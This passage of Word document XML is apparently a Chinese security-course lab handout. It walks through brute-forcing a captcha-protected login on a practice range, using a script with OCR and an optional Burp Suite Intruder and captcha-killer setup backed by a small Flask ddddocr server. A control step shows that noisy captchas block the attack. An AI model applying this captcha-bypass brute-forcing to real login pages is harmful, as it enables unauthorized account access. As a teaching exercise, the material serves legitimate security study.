    <w:p w14:paraId="632616AB" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="heading_9"/>
      <w:r>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
      <w:r>
        <w:t>：保存并退出编辑器</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="4ECDBF44" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>按下</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ctrl + O → </w:t>
      </w:r>
      <w:r>
        <w:t>回车保存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13233DB2" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>按下</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ctrl + X </w:t>
      </w:r>
      <w:r>
        <w:t>退出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F27F4DB" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="heading_10"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 6</w:t>
      </w:r>
      <w:r>
        <w:t>：添加执行权限</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11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5FFCCEB6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C91E2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chmod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+x captcha_brute.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68FD6F0C" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="heading_11"/>
      <w:r>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r>
        <w:t>：运行全自动爆破脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12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5FA89D1C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E16457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>./captcha_brute.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52FD3272" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="heading_12"/>
      <w:r>
        <w:t>正常实验现象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="6CDDF624" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>脚本自动循环：获取新验证码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:t>识别</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:t>尝试密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F140778" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>密码错误，返回：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>密码错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D901527" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>遍历到正确密码</w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t>，返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r>
        <w:t>，脚本自动停止</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C23D21C" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="heading_13"/>
      <w:r>
        <w:t>对照组实验（安全验证码效果）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="26139E01" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>将验证码链接中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mode=clean </w:t>
      </w:r>
      <w:r>
        <w:t>修改为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mode=normal</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>带噪点</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>、干扰线）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>再次运行脚本，观察现象：验证码识别出错，无法爆破成功。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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="002E484B" w14:paraId="499ED464" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct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76DB89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color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>结论：带干扰的验证码，可以防御机器</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> OCR </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>自动爆破。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C036D8B" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="heading_14"/>
      <w:r>
        <w:t>【选做拓展】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:t>实现验证码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OCR </w:t>
      </w:r>
      <w:r>
        <w:t>爆破（有余力同学）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="002E484B" w14:paraId="469622E9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct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AF3AE9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color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>难度较高，需要安装插件、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Python </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>环境，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>不强制完成</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="602A2267" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="heading_15"/>
      <w:r>
        <w:t>前置准备</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="1F8F5B1C" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Burp </w:t>
      </w:r>
      <w:r>
        <w:t>Suite</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Community/Pro </w:t>
      </w:r>
      <w:r>
        <w:t>版本）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1866D824" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>插件：</w:t>
      </w:r>
      <w:r>
        <w:t>captcha-killer-modified.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D57E62D" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Python </w:t>
      </w:r>
      <w:r>
        <w:t>环境，安装</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ddddocr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>识别库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3D722A97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640228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 xml:space="preserve">pip install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ddddocr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flask</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="533A1B77" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="heading_16"/>
      <w:r>
        <w:t>启动本地</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OCR </w:t>
      </w:r>
      <w:r>
        <w:t>识别服务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="2903EAD0" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ocr_server.py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0AAD250D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A6EE7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python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 xml:space="preserve">import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ddddocr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br/>
              <w:t xml:space="preserve">from flask import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Flask,request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br/>
              <w:t>app = Flask(__name__)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/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=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ddddocr.DdddOcr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()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>@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app.route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('/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ocr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',methods=['POST'])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>def index():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img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 xml:space="preserve"> =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request.files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['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img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'].read()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res =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ocr.classification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(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img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)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return res</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>if __name__ == '__main__':</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/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2"/>
              </w:rPr>
              <w:t>app.run</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>(host="127.0.0.1",port=9898)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2DC3B904" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>运行服务：</w:t>
      </w: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2E484B" w14:paraId="7E7552DD" w14:textId="77777777"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AC808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Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>python ocr_server.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CA6F412" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CR </w:t>
      </w:r>
      <w:r>
        <w:t>接口地址：</w:t>
      </w:r>
      <w:r>
        <w:t>http://127.0.0.1:9898/ocr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55543E59" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="heading_17"/>
      <w:r>
        <w:t xml:space="preserve">Burp </w:t>
      </w:r>
      <w:r>
        <w:t>加载插件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="164A48E0" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Extender → Add</w:t>
      </w:r>
      <w:r>
        <w:t>，加载</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> captcha-killer-modified.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAE6821" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>浏览器开启</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:t>代理，访问靶场登录页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077954DE" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="heading_18"/>
      <w:r>
        <w:t>抓包配置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="2C98F329" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>抓</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>数据包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0964BBA2" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="453" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GET </w:t>
      </w:r>
      <w:r>
        <w:t>包：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>captcha.php?mode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=clean </w:t>
      </w:r>
      <w:r>
        <w:t>获取验证码图片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649B404D" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="453" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">POST </w:t>
      </w:r>
      <w:r>
        <w:t>包：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_ocr.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>登录提交数据包，参数</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>username=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>admin&amp;password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxx&amp;code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="462887CE" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>右键验证码请求包</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → Extensions → captcha-killer → Send to captcha panel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDFD319" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">captcha-killer </w:t>
      </w:r>
      <w:r>
        <w:t>面板选择【自定义</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OCR </w:t>
      </w:r>
      <w:r>
        <w:t>接口】，填入</w:t>
      </w:r>
      <w:r>
        <w:t>http://127.0.0.1:9898/ocr</w:t>
      </w:r>
      <w:r>
        <w:t>，点击【获取】，测试识别验证码。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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="002E484B" w14:paraId="3EEC7499" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct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596C3A" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7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color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>⚠</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>️</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>重要：获取验证码和登录发包必须保持同一个</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> PHPSESSID </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>会话。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00DECB2B" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="heading_19"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Intruder </w:t>
      </w:r>
      <w:r>
        <w:t>爆破配置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="04F18805" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>登录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POST </w:t>
      </w:r>
      <w:r>
        <w:t>包发送到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Intruder</w:t>
      </w:r>
      <w:r>
        <w:t>，攻击模式：</w:t>
      </w:r>
      <w:r>
        <w:t>Pitchfork</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>叉戟模式</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B67DF24" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>设置两个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:t>标记：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA87CAF" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="453" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>password=§xxx§</w:t>
      </w:r>
      <w:r>
        <w:t>：加载密码字典</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32122B42" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="453" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>code=§</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>§</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
      <w:r>
        <w:t>类型：</w:t>
      </w:r>
      <w:r>
        <w:t>Extension-generated</w:t>
      </w:r>
      <w:r>
        <w:t>，生成器选择</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> captcha-killer-modified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EEA713" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Grep-Match </w:t>
      </w:r>
      <w:r>
        <w:t>匹配关键词：登录成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C032E5D" w14:textId="77777777" w:rsidR="002E484B" w:rsidRDefault="009975F7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="3370FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>开始攻击，插件自动拉取图片、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OCR </w:t>
      </w:r>
      <w:r>
        <w:t>识别、回填验证码，循环尝试密码。</w:t>
      </w:r>
    </w:p>
